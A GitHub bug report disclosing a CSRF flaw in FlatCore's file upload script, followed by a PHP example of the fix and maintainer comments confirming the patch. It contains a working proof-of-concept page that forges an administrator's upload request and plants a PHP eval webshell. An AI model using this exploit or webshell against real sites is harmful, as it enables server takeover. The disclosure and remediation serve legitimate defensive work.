
Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore #39

satuer opened this issue May 26, 2019 · 3 comments



commented May 26, 2019

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @satuer from ABT Labs
Security: high (allows a webshell to be uploaded)

Code: files.upload-script.php
There is no CSRF check, only an administrator check. (Moreover, there is no check on the file type, and the uploaded file name is not changed.)

Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

We assume that FlatCore is installed at … Our target is acp/core/files.upload-script.php, which is the page used to upload a new file. The given PoC will upload a webshell to the website.

<!-- CSRF PoC: when opened by a logged-in FlatCore administrator, the form below
     posts a multipart upload to files.upload-script.php with the victim's
     session cookie, dropping a PHP file into ../content/ -->
<html>
<body>
<script>
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/flatCore/acp/core/files.upload-script.php", true);
  xhr.setRequestHeader("Accept", "application/json");
  xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
  // send the victim's cookies with the cross-origin request
  xhr.withCredentials = true;
  var body = "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
    "\r\n" +
    "../content/\r\n" +
    "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"w\"\r\n" +
    "\r\n" +
    "600\r\n" +
    "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"h\"\r\n" +
    "\r\n" +
    "500\r\n" +
    "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"fz\"\r\n" +
    "\r\n" +
    "2800\r\n" +
    "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"unchanged\"\r\n" +
    "\r\n" +
    "\r\n" +
    "----------795986992\r\n" +
    "Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
    "Content-Type: text/plain\r\n" +
    "\r\n" +
    "<?php eval($_REQUEST['parm']);?>\r\n" +
    "----------795986992--\r\n";
  // send the body as raw bytes so the multipart boundaries are not re-encoded
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) {
    aBody[i] = body.charCodeAt(i);
  }
  xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
  <input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

Before visiting the PoC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The webshell has been uploaded.

First, the administrator logs in.

Then, the administrator visits the malicious webpage.

The attacker visits the webshell.

Suggestion: Check CSRF tokens in all POST requests.
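The fix the report asks for, as an added illustration that is not FlatCore's code and not the patch the maintainer shipped: a minimal PHP upload handler that issues a per-session CSRF token, verifies it in constant time on every POST, and also closes the two side issues the report mentions (no file-type check, client-chosen file name kept). The field names, the session key, the allowlist and the upload directory are assumptions made for the example.

```php
<?php
// Added example, not FlatCore code. Demonstrates: session-bound CSRF token,
// constant-time token check, content-type allowlist, random stored file name,
// fixed upload directory. Field names and UPLOAD_DIR are assumptions.
session_start();

// Assumed storage location; never taken from the request
// (the PoC above controls it via upload_destination=../content/).
const UPLOAD_DIR = __DIR__ . '/uploads';

// Extensions we accept and the sniffed MIME types each may carry.
const ALLOWED_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
    'pdf'  => ['application/pdf'],
];

// Create (once per session) the token that the upload form must echo back.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// A cross-site page cannot read the victim's session, so it cannot supply
// this value. hash_equals() avoids timing leaks on the comparison.
function csrf_check(?string $submitted): bool {
    return is_string($submitted)
        && !empty($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Validate the upload by extension allowlist plus content sniffing, then
// store it under a random name so a .php payload can never land executable.
function safe_upload(array $file, string $dest_dir): string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the real type from the bytes; the client's Content-Type header
    // (text/plain in the PoC) is attacker-controlled and ignored here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($dest_dir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject before touching $_FILES at all.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('invalid CSRF token');
    }
    try {
        $name = safe_upload($_FILES['file'] ?? [], UPLOAD_DIR);
        echo 'stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
} else {
    // The legitimate form carries the token; the attacker's page cannot.
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo '<form method="post" enctype="multipart/form-data">'
       . '<input type="hidden" name="csrf_token" value="' . $token . '">'
       . '<input type="file" name="file"> <input type="submit" value="Upload">'
       . '</form>';
}
```

Against the PoC above this fails at the first check: the forged request has no `csrf_token` field, so the handler returns 403 before the multipart body is parsed. Even if the token check were bypassed, `testwebshell.php` would be rejected by the extension allowlist, and a permitted file is stored under a random name, so the attacker no longer knows where to find it. Marking the session cookie `SameSite=Lax` or `Strict` is a useful additional layer, since browsers then omit it from cross-site POSTs, but the token check is the control that should not depend on browser behaviour.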



commented May 28, 2019

Thank you! I will fix this as soon as possible.



commented Jun 12, 2019

Check CSRF tokens before uploading files



commented Jun 13, 2019

Verified, no longer works.

@satuer satuer closed this Jun 13, 2019
